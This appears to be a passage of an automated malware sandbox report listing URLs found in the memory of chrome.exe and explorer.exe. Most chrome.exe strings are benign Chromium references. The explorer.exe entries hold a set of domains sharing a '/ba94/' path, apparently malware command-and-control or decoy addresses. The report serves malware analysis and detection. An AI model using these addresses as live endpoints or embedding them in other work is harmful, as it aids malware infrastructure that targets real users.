          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279)
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279r
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370ment
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724ancedD
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760ancedO
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760toff
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162ercent
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215yV2
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280C
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280g
          Source: explorer.exe, 00000002.00000000.1818187033.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000000.1818187033.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000000.1818187033.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227120296.00005B8000236000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2291029014.00007B6400244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2351942407.00005D4000244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crrev.com/c/2555698.
          Source: chrome.exe, 0000000F.00000000.2223108753.0000026AD4362000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: chrome.exe, 0000000E.00000000.2164569770.000028240020F000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227061366.00005B800020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://google.com/
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/2000679290
          Source: chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2223842570.000003C600295000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227979184.00005B80006A0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2228123560.00005B80006D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230384108.00005B8000D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
          Source: explorer.exe, 00000002.00000000.1818187033.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: chrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: explorer.exe, 00000002.00000000.1815983467.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1819547244.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1817375605.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arwile.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arwile.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arwile.com/ba94/www.humidityflash.site
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arwile.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creditscorewizards.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creditscorewizards.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creditscorewizards.com/ba94/www.spesandosupermercato.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creditscorewizards.comReferer:
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dxtra.shop
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dxtra.shop/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dxtra.shop/ba94/www.thesiamesebetta.biz
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dxtra.shopReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fijula.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fijula.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fijula.com/ba94/www.arwile.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fijula.com/ba94/www.hjgd.xyz
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fijula.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.galaxyprofituk.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.galaxyprofituk.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.galaxyprofituk.com/ba94/www.yqwija.info
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.galaxyprofituk.comReferer:
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gspotshop.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gspotshop.com/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gspotshop.com/ba94/www.fijula.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gspotshop.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/ba94/www.fijula.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/ba94/www.naservus.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/ba94/www.whatpixels.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.humidityflash.site
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.humidityflash.site/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.humidityflash.site/ba94/www.steam.help
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.humidityflash.siteReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacobmcfarland.dev
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacobmcfarland.dev/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacobmcfarland.dev/ba94/www.creditscorewizards.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacobmcfarland.devReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naservus.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naservus.com/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naservus.com/ba94/www.dxtra.shop
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naservus.com/ba94/~~~~~~~~
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naservus.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.posteo.lol
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.posteo.lol/ba94/
